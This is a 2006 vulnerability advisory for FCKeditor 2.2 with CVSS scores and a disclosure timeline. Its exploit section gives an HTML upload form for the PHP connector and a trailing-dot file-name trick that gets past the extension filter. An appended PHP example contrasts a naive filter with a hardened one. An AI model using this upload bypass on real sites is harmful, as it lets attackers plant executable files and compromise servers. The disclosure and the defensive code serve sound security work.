Vulnerability FCKeditor 2.2

2006.02.24
Credit: NSA Group
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 6.4/10
Impact Subscore: 4.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: None

Advisory: NSAG-№196-23.02.2006
Research: NSA Group [Russian company on Audit of safety & Network security]
Site of Research: http://www.nsag.ru or http://www.nsag.org
Product: FCKeditor 2.2
Site of manufacturer: http://www.fckeditor.net

Status:
19/11/2005 - Publication is postponed.
19/11/2005 - Manufacturer is notified.
21/02/2006 - Answer of the manufacturer is absent.
21/02/2006 - Publication of vulnerability.

Original Advisory: http://www.nsag.ru/vuln/893.html
Risk: Critical

Description: The filter on file extensions can be bypassed.
Impact: Forbidden files can be uploaded to the target system.

Exploit:

<form action="http://host/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/" method="POST" enctype="multipart/form-data">
File Upload<br>
<input id="txtFileUpload" type="file" name="NewFile">
<br>
<input type="submit" value="Upload">
</form>

Put a "." (dot) at the end of the name of the uploaded file (example: testfile.php.). As a result, the file testfile.php is created on the server.

Solution: No fix from the manufacturer is known. Contact us and receive consultations.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Our company is an independent auditor of software in the IT market. Independent software audit is now becoming standard practice, and we offer to make a released product as well protected as possible against various kinds of attacks by malefactors!
www.nsag.ru
"Nemesis" © 2006
------------------------------------
Nemesis Security Audit Group © 2006.
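
The trailing-dot bypass described above, seen from the filter's side. This is an added example, not FCKeditor's code and not part of the advisory: it assumes the weak filter compares the text after the last dot with a deny list, and the lists and function names are hypothetical.

```php
<?php
// Added example: not FCKeditor's code. Lists and function names are hypothetical.
const DENIED  = ['php', 'php3', 'php4', 'php5', 'phtml', 'asp', 'aspx', 'cgi', 'pl'];
const ALLOWED = ['txt', 'pdf', 'zip', 'jpg', 'png', 'gif'];

// Assumed weak filter: compare the text after the last dot with a deny list.
// For "testfile.php." that text is empty, so the name passes.
function naiveIsAllowed(string $name): bool
{
    $pos = strrpos($name, '.');
    $ext = $pos === false ? '' : strtolower((string) substr($name, $pos + 1));
    return !in_array($ext, DENIED, true);
}

// Hardened filter: canonicalise the name first, then apply an allow list.
// Returns the cleaned name, or null when the upload must be rejected.
function safeUploadName(string $name): ?string
{
    $name = basename(str_replace('\\', '/', $name));               // drop client path
    $name = (string) preg_replace('/[\x00-\x1F\x7F]/', '', $name); // drop control bytes
    $name = rtrim($name, '. ');      // Windows drops trailing dots/spaces on save
    if ($name === '' || $name[0] === '.') {
        return null;                 // empty name or dotfile such as .htaccess
    }
    $segments = explode('.', strtolower($name));
    array_shift($segments);          // discard the base name
    if ($segments === [] || !in_array(end($segments), ALLOWED, true)) {
        return null;                 // no extension, or final one not allowed
    }
    foreach ($segments as $segment) {
        if (in_array($segment, DENIED, true)) {
            return null;             // e.g. shell.php.jpg
        }
    }
    return $name;
}

// Constructed sample names, including the one from the advisory.
foreach (['report.pdf', 'testfile.php', 'testfile.php.', 'shell.php.jpg', '.htaccess'] as $n) {
    printf("%-15s naive=%-6s hardened=%s\n", $n,
        naiveIsAllowed($n) ? 'accept' : 'reject',
        safeUploadName($n) ?? 'reject');
}
```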

